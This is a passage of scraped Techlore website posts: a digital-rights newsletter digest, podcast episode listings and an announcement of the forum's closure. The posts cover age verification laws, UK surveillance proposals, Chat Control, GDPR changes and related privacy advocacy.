an![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-31.png)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/v6.jpg)](https://techlore.tech/the-year-the-internet-changed-forever-2025-digital-rights-awards/) We sat down with Marloes de Koning to discuss tech policy from a journalist's perspective, as well as age verification, digital sovereignty, news consumption, the rules & role of journalism, and more: [Is the World Too Dependent on American Tech? (Dutch Journalist Interview)Techlore Talks brings you in-depth conversations with the experts at the forefront of digital rights, privacy and security.![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-30.png)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/20251117-MARLOES-INTERVIEW-thumbnail-v1.jpg)](https://techlore.tech/is-the-world-too-dependent-on-american-tech-dutch-journalist-interview/) The latest Surveillance Report highlights ChatGPT's decisions to sponsor responses and many other critical stories: [Your ChatGPT Answers Are About to Get SponsoredTechlore Surveillance Report: Weekly News for Your Digital Freedom![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-32.png)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/_Thumbnail-Surveillance-Report.jpg)](https://techlore.tech/your-chatgpt-answers-are-about-to-get-sponsored/) And finally, a few months ago we were invited to Cyprus to attend the Ad Filtering Dev Summit, and we published a recap video on YouTube and [PeerTube](https://techlore.tv/w/jYTJ21jgorGZsELm5WY4PT) to showcase the latest developments in the ad-blocking world: --- ## Action Item ✅ - If you're a California resident, submit your DROP deletion request NOW at - **For everyone else:** Contact your legislators and ask them to implement similar centralized deletion systems. California proved it's possible, your state or country can do it too. - **And finally:** Take a moment to appreciate that sometimes we actually get infrastructure that works. DROP isn't perfect (the August timeline is frustrating), and yes there are exemptions (public records, first-party data, HIPAA-covered medical info). But it's real, it's live, and it begins to shift the burden from individuals to brokers. That's worth celebrating and building on. Thanks for staying informed, taking action, and being part of building something better. See you next week and happy new year!! ### The Year the Internet Changed Forever (2025 Digital Rights Awards) URL: https://techlore.tech/the-year-the-internet-changed-forever-2025-digital-rights-awards/ Last updated: 2026-01-05T23:17:33.000Z 2025 was the year everything we warned about actually started happening, but we also saw massive wins! This is the first year of The Digital Rights Awards, covering the 10 biggest wins, losses, controversies, and lessons that will shape 2026\. Happy new year everyone! [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv) ### Your ChatGPT Answers Are About to Get Sponsored URL: https://techlore.tech/your-chatgpt-answers-are-about-to-get-sponsored/ Last updated: 2026-04-07T23:20:42.000Z This week's Surveillance Report covers OpenAI's plan to prioritize sponsored content in ChatGPT answers, what to do if you're targeted by government spyware, Meta's secret playbook for avoiding scammer accountability, and more! 📰 Listen to the weekly podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-surveillance-report/id1507714387), [Spotify](https://open.spotify.com/show/5rxm041iDXxe0rINwO5G0c), or any [podcast app](https://feeds.acast.com/public/shows/65e15188b8456c00169f4864). You can also watch Surveillance Report on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZemCIsHUIuEtugAmUxAYHS) or [Techlore.TV](https://techlore.tv/w/p/twkcDETcDauUXuaGNJnhZG) #### Episode Timestamps 00:00 Intro to Surveillance Report 00:37 OpenAI Sponsored Content 05:20 How to Handle Government Spyware 12:38 Our Sponsor: EasyOptOuts! 14:15 Meta Embracing Scammers 22:02 Defense Bulletin #### Episode Sources ****Highlight: ChatGPT Ads Will Prioritize Sponsored Content Over Accurate Answers** - ****Story 1: Targeted by Government Spyware? Here's What You Need to Know** - - ****Story 2: Leaked Documents Reveal Meta's Playbook to Avoid Scammer Crackdowns** - ****The Defense Bulletin** - - - - - - - - - - - - - - - - - - ### Is the World Too Dependent on American Tech? (Dutch Journalist Interview) URL: https://techlore.tech/is-the-world-too-dependent-on-american-tech-dutch-journalist-interview/ Last updated: 2026-04-07T23:24:11.000Z This is a different kind of Techlore Talks. Henry sits down with Marloes de Koning, a Dutch tech reporter from NRC. This wide-ranging conversation explores tech policy from a journalist's perspective, and asks hard questions about age verification, digital sovereignty, news consumption, the rules & role of journalism, and more. 🔐 Listen to the podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-talks/id1652151010), [Spotify](https://open.spotify.com/show/1qjWVCYgRcZFL9c8FsLLo0), or any [podcast app](https://feeds.acast.com/public/shows/665039d6f749480012b06ac1). You can also watch Techlore Talks on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZRb5Z4qZjsIGZrUWbDc3Mn) or [Techlore.TV](https://techlore.tv/w/p/iZqf9xe1fE7Ss4pebDKd42) #### Episode Timestamps 00:00 INTRO 01:27 EARLY YEARS IN JOURNALISM 02:25 LEARNING & WRITING ABOUT TECH 04:28 DIGITAL SOVEREIGNTY 07:08 LOCATION OF DATA/COMPANIES 09:01 THE RULES OF JOURNALISM 10:31 THE ROLE OF JOURNALISM 19:11 INCORRECT ASSUMPTIONS 20:34 HOW TO FIND TRUSTWORTHY NEWS 30:06 IS CONSUMING NEWS EVEN WORTH IT? 34:55 AGE VERIFICATION 45:13 DO PEOPLE CARE ABOUT PRIVACY? 53:18 MARLOES' DIGITAL RIGHTS JOURNEY 55:19 WHAT'S THE END GOAL? 57:53 HOW TO FOLLOW MARLOES 59:06 OUTRO #### Episode Sources • NRC: https://www.nrc.nl • Twitter/X: https://x.com/MarloesdeK • Marloes' Age Verification article: https://www.nrc.nl/nieuws/2024/04/19/het-hoofdpijndossier-van-de-porno-industrie-controleren-hoe-oud-je-bezoekers-zijn-a4196562 • Marloes' Tornado Cash article: https://www.nrc.nl/nieuws/2024/03/25/hoe-een-rus-uit-amstelveen-met-zijn-cryptomixer-voor-de-rechter-in-den-bosch-belandt-a4194203 • Marloes' Birthday of the Cookie article: https://www.nrc.nl/nieuws/2024/10/11/hoe-het-internet-een-geheugen-kreeg-a4868671 ### Federal Court Just Dealt a Major Blow to Age Verification Laws URL: https://techlore.tech/federal-court-just-dealt-a-major-blow-to-age-verification-laws/ Last updated: 2026-04-07T23:20:27.000Z This week's Surveillance Report covers a federal court blocking Texas's age verification law, AI police cameras exposed to the internet, massive data breaches affecting millions of people, and more! Happy holidays! 📰 Listen to the weekly podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-surveillance-report/id1507714387), [Spotify](https://open.spotify.com/show/5rxm041iDXxe0rINwO5G0c), or any [podcast app](https://feeds.acast.com/public/shows/65e15188b8456c00169f4864). You can also watch Surveillance Report on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZemCIsHUIuEtugAmUxAYHS) or [Techlore.TV](https://techlore.tv/w/p/twkcDETcDauUXuaGNJnhZG) #### Episode Timestamps 00:00 Welcome to Surveillance Report 00:45 Judge Blocks Texas Age Verification 06:14 AI Super Pacs 10:14 Flock's Surveillance 17:52 Support Techlore! 18:34 Return to Monke Holiday Message 26:34 The Defense Bulletin #### Episode Sources ****Highlight: Federal Court Blocks Texas Age Verification Law** - - ****Story 1: AI Industry acting like big oil.** - - ****Story 2: AI Police Cameras Exposed to Internet—Investigators Tracked Themselves** - - - - ****Story 3: Holiday Special on Cassettes from 404** - ****The Defense Bulletin** - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ### We Make Money From Ads, But Here's Why Ad Blocking Matters (AFDS 2025 Recap) URL: https://techlore.tech/we-make-money-from-ads-but-heres-why-ad-blocking-matters-afds-2025-recap/ Last updated: 2025-12-23T18:56:57.000Z We flew to Cyprus for the 2025 Ad Filtering Dev Summit where researchers and engineers from Brave, DuckDuckGo, AdGuard, Firefox, Ghostery, eyeo, and others revealed the future of ad blocking. In this video we summarize five critical talks that are shaping the future of the ad industry. [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv) ### Digital Rights Digest | Dec 15-21 URL: https://techlore.tech/digital-rights-digest-dec-15-21/ Last updated: 2025-12-22T16:46:25.000Z ## On Our Radar 🎯 **The UK's Triple Threat to Digital Privacy** The United Kingdom is making a coordinated push to dismantle digital privacy on multiple fronts simultaneously, and it's one of the most alarming developments we've seen this year. 1. **First: Mandatory on-device scanning.** [New proposals](https://reclaimthenet.org/uk-lawmakers-propose-mandatory-on-device-surveillance-and-vpn-age-verification ) would require everyone's devices to scan content before encryption, the technical equivalent of forcing you to let police search your home before you're allowed to lock your door. 2. **Second: VPN age verification and website tracking.** The [same proposals ](https://reclaimthenet.org/uk-lawmakers-propose-mandatory-on-device-surveillance-and-vpn-age-verification )would require VPNs to verify users' ages and log which websites those users visit—turning privacy tools into surveillance tools. 3. **Third: Threatening encrypted messaging developers.** The UK's Investigatory Powers Commissioner's Office [warned](https://www.techradar.com/vpn/vpn-privacy-security/creating-apps-like-signal-or-whatsapp-could-be-hostile-activity-claims-uk-watchdog) that creating apps like Signal or WhatsApp could constitute "hostile activity" against the state. Read that again: building tools that protect privacy is being framed as an attack on the government. The UK is openly proposing to break encryption, mandate surveillance, and criminalize the development of open source tools. The most frustrating part about all of this is that these were proposed by lawmakers when they were supposed to 'debate' the outrage from the 500k+ signatures from the UK age verification laws passed in July. Instead of listening to people's complaints, they've proposed some of the world's most dystopian surveillance we've ever seen. **This is a global problem:** These proposals become templates. When one Western democracy normalizes on-device scanning or frames E2EE as "hostile," other governments cite it as precedent. The UK isn't just threatening its own citizens' privacy, it's providing cover for authoritarian regimes to do the same. **What you can do:** If you're in the UK, contact your MP and explain why these proposals are technically impossible without destroying safety on the internet entirely. If you're not in the UK, support organizations like the EFF and Privacy International fighting these proposals, because what starts in the UK doesn't stay there. Share these stories with people who don't work in tech. --- ## Bits & Bytes 🤖 **\~** [**TikTok Sale Proves It was Never About Keeping You Safe**](https://arstechnica.com/tech-policy/2025/12/bytedance-confirms-tiktok-will-be-sold-to-us-owners/) ByteDance confirmed TikTok will transfer majority control (80.1%) to US investors, with a deal expected to close soon. But the structure is complicated: ByteDance retains 19.9% ownership, a board seat, and keeps the algorithm (with oversight from other big tech companies). **Our take:** This was never about protecting Americans' privacy, it was about which government has access. Surveillance and data collection are problems regardless of whether it's China, the US, or any other country doing it. The fact that politicians are fine with Facebook, Google, and X collecting massive amounts of data but panic over TikTok reveals this isn't a privacy concern—it's a geopolitical one. If we actually cared about protecting citizens, we'd have comprehensive privacy regulations that apply to all platforms regardless of country of origin. The internet is global, data flows across borders; whatever concerns exist about TikTok's data practices should apply equally to every social media platform. **\~** [**$100M Super PAC Aims to "Drown Out" AI Critics**](https://www.msn.com/en-us/politics/government/super-pac-aims-to-drown-out-ai-critics-in-midterms-with-100m-and-counting/ar-AA1LeEsy) A new US super PAC called "Leading the Future" launched with over $100 million in initial funding to support "pro-AI" candidates in the 2026 midterms and oppose lawmakers who support AI regulation. Backers include OpenAI president Greg Brockman and venture capital firm Andreessen Horowitz, which has spent $2.7 million lobbying Congress this year. The super PAC will intervene in both federal and state races, starting with New York, California, Illinois, and Ohio. It plans to oppose state-level AI legislation and target counties that restrict AI infrastructure development. They're also launching an allied nonprofit for "rapid-response campaigns" to counter what they call "anti-innovation narratives." **Our take:** When an industry raises $100 million specifically to eliminate lawmakers who question them, that's **not** innovation—it's an attempt to consolidate power before anyone can put guardrails in place. Whether you think AI poses existential risks or not, the idea that one industry should be able to spend nine figures to ensure no meaningful oversight happens should concern everyone. The irony of calling critics "doomers" while spending $100 million to silence debate about potential risks isn't lost on anyone paying attention. --- ## This Week on Techlore 📺 We did some thorough video coverage of the UK's attack on digital rights. A great one to share with loved ones if they prefer a video format: [UK Proposes 24/7 Phone Surveillance & VPN Age VerificationThe UK just proposed three extreme surveillance measures: mandatory 24/7 scanning software on every phone and tablet, age verification for all VPN users with website tracking, and labeling encryption developers as “hostile actors.” This comes after 500,000 people petitioned against age verification, and lawmakers responded by making things![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-27.png)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/v9.png)](https://techlore.tech/uk-proposes-24-7-phone-surveillance-vpn-age-verification/) A quick recap of Techlore in 2025 and the changes to expect in 2026: [What’s Next for Techlore in 2026: Major Changes Explained2025 was Techlore’s biggest year ever—and 2026 is bringing many exciting things too! But to keep fighting for digital rights, we had to make some difficult changes. Here’s what we’re consolidating, why our forum is closing June 1st 2026, how what we’re doing is evolving, and the exciting things![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-28.png)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/thumbnail2.png)](https://techlore.tech/whats-next-for-techlore-in-2026-major-changes-explained/) The latest Surveillance Report highlights attacks against free speech on the internet in the US: [The Law That Protects Your Online Speech Is Under AttackTechlore Surveillance Report: Weekly News for Your Digital Freedom![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-29.png)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/_Thumbnail-Surveillance-Report-2.png)](https://techlore.tech/the-law-that-protects-your-online-speech-is-under-attack/) --- ## Action Item ✅ **This week:** If you're in the UK, contact your MP before the holidays. Share a bit about yourself and explain in simple terms why these proposals concern you. You don't need to be a technical expert, your voice as a constituent matters. Your MP needs to hear from real people, not just lobbyists. **For everyone:** Take one story from this digest and share it with someone at the holiday dinner table. Not as doom and gloom, but as "hey, did you know this is happening?" Normalizing these conversations is how we build awareness and resistance. **And finally:** Log off. Take a real break during the holidays. Spend time with people you care about, rest, recharge. We're in this for the long haul, and burnout doesn't serve anyone. The fight for digital rights will still be here when you get back. Thank you for caring, for staying informed, and for taking action when it counts. Enjoy the holidays! ### UK Proposes 24/7 Phone Surveillance & VPN Age Verification URL: https://techlore.tech/uk-proposes-24-7-phone-surveillance-vpn-age-verification/ Last updated: 2025-12-21T03:57:00.000Z The UK just proposed three extreme surveillance measures: mandatory 24/7 scanning software on every phone and tablet, age verification for all VPN users with website tracking, and labeling encryption developers as "hostile actors." This comes after 500,000 people petitioned against age verification, and lawmakers responded by making things worse. Here's what's actually in the Children's Wellbeing and Schools Bill, why it matters globally, and what you can do. [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv) ### The Law That Protects Your Online Speech Is Under Attack URL: https://techlore.tech/the-law-that-protects-your-online-speech-is-under-attack/ Last updated: 2026-04-07T23:20:11.000Z This week's Surveillance Report covers the internet's free speech protections under attack as a US Senator moves to repeal Section 230\. Plus: ransomware attacks escalate with React2Shell exploitation, India orders government access to encrypted messaging, AI "superintelligence" fear is being used to justify actual corporate manipulation happening right now, and Apple still refuses to comply with EU law. 📰 Listen to the weekly podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-surveillance-report/id1507714387), [Spotify](https://open.spotify.com/show/5rxm041iDXxe0rINwO5G0c), or any [podcast app](https://feeds.acast.com/public/shows/65e15188b8456c00169f4864). You can also watch Surveillance Report on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZemCIsHUIuEtugAmUxAYHS) or [Techlore.TV](https://techlore.tv/w/p/twkcDETcDauUXuaGNJnhZG) #### Episode Timestamps 00:00 Welcome to Surveillance Report 00:40 Highlight Story: Section 230 Under Attack 09:00 React2Shell Updates 10:58 More Surveillance Attempts in India 16:38 Our Sponsor: EasyOptOuts! 18:12 AI Hype Explained 26:38 Apple is Breaking EU Law 27:16 Global Attacks on Privacy Compilation 31:44 The Defense Bulletin #### Episode Sources ****Highlight: US Senator Moves to Repeal Section 230** - - ****Story 1: React2Shell Now Being Used in Ransomware Attacks** - - ****Story 2: India Orders Government Access to Encrypted Messaging** - ****Story 3: AI Hype Weaponized to Justify Manipulation and Extraction** - - - ****Story 4: Apple Still Breaking EU Interoperability Law** - ****Story 5: Global Attacks on Privacy** - - - - - - - ****The Defense Bulletin** - - - - - - - - - - - - - - - - - - - - - - - - - - - ### What's Next for Techlore in 2026: Major Changes Explained URL: https://techlore.tech/whats-next-for-techlore-in-2026-major-changes-explained/ Last updated: 2025-12-16T22:38:18.000Z 2025 was Techlore's biggest year ever—and 2026 is bringing many exciting things too! But to keep fighting for digital rights, we had to make some difficult changes. Here's what we're consolidating, why our forum is closing June 1st 2026, how what we're doing is evolving, and the exciting things coming in 2026 with our expanded team. [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv) ### Digital Rights Digest | Dec 8-14 URL: https://techlore.tech/digital-rights-digest-dec-8-14/ Last updated: 2025-12-16T02:18:59.000Z ## On Our Radar 🎯 **Age Verification Goes Global: Australia's Ban Is Just the Beginning** Australia [just became the first country to ban social media for anyone under 16](https://www.cnbc.com/2025/12/10/australia-16-year-old-teens-ban-social-media-policy-law-ig-tiktok-fb-reddit-youtube-snapchat.html). [Denmark announced they're following suit](https://www.columbian.com/news/2025/dec/11/denmark-plans-to-severely-restrict-social-media-use-for-young-people/). And the EU is exploring [similar measures.](https://www.patrick-breyer.de/en/reality-check-eu-council-chat-control-vote-is-not-a-retreat-but-a-green-light-for-indiscriminate-mass-surveillance-and-the-end-of-right-to-communicate-anonymously/) Here's what makes this dangerous: Age verification doesn't just affect kids—it requires *everyone* to prove their age. That means showing ID, uploading documents, or submitting to facial recognition scans just to access social media, forums, or any platform where minors *might* be present. The infrastructure being built for "protecting children" creates a surveillance system that tracks every adult online. Once these systems exist, the scope expands. Today it's social media for under-16s. Tomorrow it's "adult content" for under-18s. Eventually, it's requiring ID verification for any platform the government deems necessary to "protect" someone. Australians teens are already [trying to beat the checks](https://dailytimes.com.pk/1418410/australian-teens-evade-social-media-age-ban/), but the surveillance infrastructure affects everyone else permanently. The [EFF's new resource hub ](https://www.eff.org/age)breaks down hidden dangers of age verification, from data breaches to excluding online communities to enabling government censorship. Make no mistake, this is building the infrastructure to control who can speak, where, and when. And it's spreading fast. **Personal Note:** I'm hearing from community members how some countries are trying to implement this with better privacy via technologies like Zero Knowledge Proofs. While I think this is a *great* improvement in addressing the privacy concerns, it still doesn't solve the other fundamental problems outlined above. **What you can do:** Read and develop your talking points for why these laws are dangerous by visiting the [EFF's Age Verification Hub](https://www.eff.org/age) — then figure out who your representatives are and express to them your concerns with these technologies. This is being proposed nearly *everywhere,* so it's quite likely you have work to do. --- ## Bits & Bytes 🤖 **\~** [**Man Arrested for Wiping Phone Before Border Search**](https://www.404media.co/man-charged-for-wiping-phone-before-cbp-could-search-it/) A traveler was charged with obstruction after factory-resetting his Google Pixel before U.S. Customs and Border Protection could search it. CBP claims he "destroyed evidence" by wiping the device. This sets a terrifying precedent: exercising your right to privacy becomes criminal obstruction. **Our take:** Wiping your device shouldn't be obstruction. But if you're under investigation, know that deleting data can be used against you. The safest approach: maintain good security hygiene *before* you travel (encrypted devices, minimal data on your phone), not panic-wiping at the border. **\~** [**EU Proposes Gutting GDPR Protections in the Name of "Red Tape Cuts"**](https://www.eff.org/deeplinks/2025/12/eus-new-digital-package-proposal-promises-red-tape-cuts-guts-gdpr-privacy-rights) The EU's new "Digital Package" promises to cut bureaucratic red tape by actually weakening GDPR privacy protections. The proposal makes it easier for companies to process personal data and harder for individuals to enforce their rights—all while claiming to "modernize" privacy rules. **Our take:** "Cutting red tape" is code for "making it easier for companies to abuse your data." GDPR isn't perfect, but weakening it now, while AI-fueled surveillance capitalism runs rampant, is moving in the wrong direction. **\~** [**India Pushes for Greater Phone Location Surveillance**](https://www.reuters.com/sustainability/boards-policy-regulation/india-weighs-greater-phone-location-surveillance-apple-google-samsung-protest-2025-12-05/) India is considering requiring Apple, Google, and Samsung to provide real-time location data from smartphones to law enforcement without individual warrants. The companies are pushing back, but the proposal would create mass surveillance infrastructure affecting hundreds of millions of people. They're also trying to require [only KYC'd SIM cards](https://thehackernews.com/2025/12/india-orders-messaging-apps-to-work.html) to be used with encrypted messengers. **Our take:** This is the nightmare scenario: always-on location tracking accessible to government without oversight. If India succeeds, other countries may follow. The world's eyes are on India, and we need to do what we can to support our Indian friends fighting these things. Even the big tech companies think this goes too far and jeopardizes users. --- ## This Week on Techlore 📺 Most notably, we announced the shutdown of our forum in favor of consolidating everything here on Ghost. You can learn more here and we'll have a video coming soon: [Techlore’s New Home: Our Platform Transition & What’s NextEverything: videos, podcasts, blog, newsletter, and memberships—is now consolidated at techlore.tech, powered by Ghost.![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-23.png)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/OpenGraph-1-4.jpg)](https://techlore.tech/techlores-new-home-our-platform-transition-whats-next/) We interviewed Marc Prud'hommeaux from F-Droid on Google's dangerous new policies for Android in an insightful Techlore Talks episode: [Google’s New Policy is an “Extinction Event” (F-Droid Interview)Techlore Talks brings you in-depth conversations with the experts at the forefront of digital rights, privacy and security.![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-24.png)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/20251128-F-DROID-INTERVIEW-thumbnail-v5.png)](https://techlore.tech/googles-new-policy-is-an-extinction-event-f-droid-interview/) This week's Surveillance Report was a deep dive on many of the stories shared in this digest: [Your Age Is Now Required: Australia’s Social Media Ban ExplainedThis week’s Surveillance Report covers the dangerous reality that social media bans ARE age verification, India’s push for even more invasive phone surveillance, a massive vulnerability actively exploited against major companies, the EU’s new proposal to gut GDPR protections, Petco’s escalating security disasters, border agents charging people for protecting their![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-25.png)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/_Thumbnail-Surveillance-Report3-1.png)](https://techlore.tech/your-age-is-now-required-australias-social-media-ban-explained/) We did some coverage on Chat Control, how there are still concerns, and what we need to do in the coming weeks: [Chat Control 2.0: From Mass Scanning to Killing AnonymityThe EU’s “Chat Control” regulation has returned with a dangerous twist: “voluntary” mass scanning and mandatory age verification that ends anonymous communication for 450 million Europeans. This isn’t just an EU issue - it’s part of a global crackdown on privacy affecting everyone who uses WhatsApp, Signal, and other messaging![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-26.png)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/chat-control-NEW.png)](https://techlore.tech/chat-control-2-0-from-mass-scanning-to-killing-anonymity/) Finally, we did a quick review of an encrypted flash drive that works without software: [Encryption Without Software (iStorage datAshur PRO+C Review)The iStorage datAshur PRO+C is a hardware-encrypted USB-C flash drive that requires a PIN to unlock - no software needed. In this review, we test this security device to see if it’s worth it for protecting sensitive data across all operating systems without any drivers or apps. Watch on![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-22.png)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/thumbnail5.png)](https://techlore.tech/encryption-without-software-istorage-datashur-pro-c-review/) --- ## Action Item ✅ **This week:** If you live in a country considering age verification laws (US, UK, EU, Australia, etc.), contact your representatives. Use a template, or ideally write your own explaining why age verification creates surveillance infrastructure that affects everyone—including you—not just kids. Make it clear that "protecting children" doesn't justify building a digital ID system for the entire internet. Even better: Share the [EFF's age verification resource hub](https://www.eff.org/age) with at least one person who doesn't work in tech or privacy. Regular people need to understand this before it's normalized. ### Chat Control 2.0: From Mass Scanning to Killing Anonymity URL: https://techlore.tech/chat-control-2-0-from-mass-scanning-to-killing-anonymity/ Last updated: 2025-12-13T03:00:14.000Z The EU's "Chat Control" regulation has returned with a dangerous twist: "voluntary" mass scanning and mandatory age verification that ends anonymous communication for 450 million Europeans. This isn't just an EU issue - it's part of a global crackdown on privacy affecting everyone who uses WhatsApp, Signal, and other messaging platforms. Take action before this becomes law in 2026. [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv) ### Your Age Is Now Required: Australia's Social Media Ban Explained URL: https://techlore.tech/your-age-is-now-required-australias-social-media-ban-explained/ Last updated: 2026-04-07T23:19:51.000Z This week's Surveillance Report covers the dangerous reality that social media bans ARE age verification, India's push for even more invasive phone surveillance, a massive vulnerability actively exploited against major companies, the EU's new proposal to gut GDPR protections, Petco's escalating security disasters, border agents charging people for protecting their data, and more! 📰 Listen to the weekly podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-surveillance-report/id1507714387), [Spotify](https://open.spotify.com/show/5rxm041iDXxe0rINwO5G0c), or any [RSS app](https://feeds.acast.com/public/shows/65e15188b8456c00169f4864). You can also watch Surveillance Report on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZemCIsHUIuEtugAmUxAYHS) or [Techlore.TV](https://techlore.tv/w/p/twkcDETcDauUXuaGNJnhZG) #### Episode Timestamps 00:00 Welcome to Surveillance Report 00:40 Highlight: Australia's Social Media Ban 08:06 Vulnerability Hitting Countless Sites 09:52 India's Surveillance Tech Continues 13:30 Support Techlore! 14:50 EU's Digital Omnibus 19:56 Petco's Data Breach(es) Saga 23:20 Man Arrested for Wiping Phone? 27:20 Defense Bulletin #### Episode Sources ****Highlight: Social Media Bans ARE Age Verification** - - - - - ****Story 1: React2Shell - Critical Vulnerability Actively Exploited** - - - ****Story 2: India Pushes for Greater Phone Location Surveillance** - ****Story 3: EU's New Digital Package Threatens to Gut GDPR Protections** - ****Story 4: Petco's Escalating Security Disasters** - - - ****Story 5: Man Charged for Wiping Phone Before Border Search** - - ****The Defense Bulletin** - - - - - - - - - - - - - - - - - - - - - - - - - - - ### Google’s New Policy is an “Extinction Event” (F-Droid Interview) URL: https://techlore.tech/googles-new-policy-is-an-extinction-event-f-droid-interview/ Last updated: 2026-04-07T23:23:58.000Z Google's new Developer Registration Program is catastrophic for F-Droid and open source app distribution. In this interview, Marc Prud'hommeaux from the F-Droid Board of Directors explains what's happening, why it matters (even if you only use the Google Play Store or Apple's App Store), and what concrete actions you can take RIGHT NOW. We discuss why F-Droid calls this an "extinction event," the implications for open source development, and what you can do to fight back. 🔐 Listen to the podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-talks/id1652151010), [Spotify](https://open.spotify.com/show/1qjWVCYgRcZFL9c8FsLLo0), or any [RSS app](https://feeds.acast.com/public/shows/665039d6f749480012b06ac1). You can also watch Techlore Talks on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZRb5Z4qZjsIGZrUWbDc3Mn) or [Techlore.TV](https://techlore.tv/w/p/iZqf9xe1fE7Ss4pebDKd42) #### Episode Sources • ### Techlore's New Home: Our Platform Transition & What's Next URL: https://techlore.tech/techlores-new-home-our-platform-transition-whats-next/ Last updated: 2025-12-16T22:37:10.000Z **Big news: Techlore has a new home.** Everything is now consolidated at [techlore.tech](https://techlore.tech/), powered by Ghost. But there's difficult news too: **we're closing our public forum.** ## What's happening to the forum As of today, our [forum](https://discuss.techlore.tech/) is read-only. It will remain accessible until **June 1, 2026** so you can export your data and reference valuable threads. After that, all user data will be automatically deleted. Users can still DM each other to exchange contact info if they wish. This was an incredibly difficult decision we went back & forth on for months. The forum has been a space where many of you connected, shared knowledge, and built relationships around privacy and digital rights. Losing that hurts—not just for the community, but for us too. But here's the reality we faced: As a **2-person team**, we haven't been able to give the forum the attention it deserves to thrive as a space that serves everyone well. Forums require sustained focus, energy, and care—energy we need to direct toward our core mission. And right now, that mission is more urgent than ever. ## Why we're making this change **We're seeing an explosion of interest in our work for digital rights advocacy.** Over the past year, we've been deeply involved in Chat Control, age verification laws, VPN bans, and other critical threats to digital freedom. The response has been overwhelming. People are waking up, policymakers are paying attention, and we need to step up. Between video content, our new newsletter, two podcasts, Go Incognito updates, and advocacy work, we had to focus our limited bandwidth where it matters most: **creating content and fighting for your digital rights.** ## What Ghost brings you Ghost consolidates everything in one place and gives you **complete control** over what you follow: - **🏡 Everything unified:** Videos, blog posts, Surveillance Report, Techlore Talks, newsletter, and memberships—all at [techlore.tech](https://techlore.tech/). - **🎛️ Granular RSS control**: This is huge. It means you choose exactly what you want to see. - Only want Surveillance Report? Just follow: `techlore.tech/tag/surveillance-report/rss/` - Want blog posts but not videos? Follow the [blog](https://techlore.tech/tag/blog/rss/) feed. - We list all ways to follow different things via RSS on our [page here.](https://techlore.tech/follow-techlore/) - **📰 Digital Rights Digest: Our new newsletter**: Threats to your freedom and how to fight back. A five-minute weekly read, 100% free. This is your direct line to everything we publish, all in one place. [Sign up here.](https://techlore.tech/#/portal/signup) - **🔧 Dedicated resource tools (coming soon):** Our resources are getting proper homes as standalone websites: - [**vpn.techlore.tech**](https://vpn.techlore.tech/) \- VPN comparison chart - [**privacytools.techlore.tech**](https://privacytools.techlore.tech/) \- Curated privacy resources - [**quiz.techlore.tech**](https://quiz.techlore.tech/) \- Privacy/SPA quiz - Right now these redirect to our old site during the transition, but dedicated versions are coming soon. ## Where to connect now 👉 **Digital Rights Digest (free 